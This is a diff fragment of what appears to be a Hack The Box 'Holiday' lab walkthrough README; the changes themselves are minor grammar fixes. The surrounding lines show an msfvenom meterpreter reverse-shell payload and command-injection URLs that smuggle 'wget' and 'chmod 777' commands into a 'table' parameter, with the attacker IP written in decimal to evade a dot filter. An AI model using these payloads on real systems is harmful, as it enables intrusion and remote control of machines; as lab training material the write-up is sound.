madneal/htb/Holiday/README.md

 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.16.65 LPORT=1234 -f elf > shell
 ```

 Then upload the shell to the victim and execute it.
 As you are not allowed to use `.`.
-So convert IP address to decimal by [this website](https://www.ipaddressguide.com/ip).
-Access the following urls to execute the corresponding commands:
+So convert the IP address to decimal by [this website](https://www.ipaddressguide.com/ip).
+Access the following URLs to execute the corresponding commands:

 * upload shell: `http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp%20%26%26wget%20168431681/shell`
 * change permission: `http://10.10.10.25:8000/admin/export?table=notes%26chmod%20777%20/tmp/shell`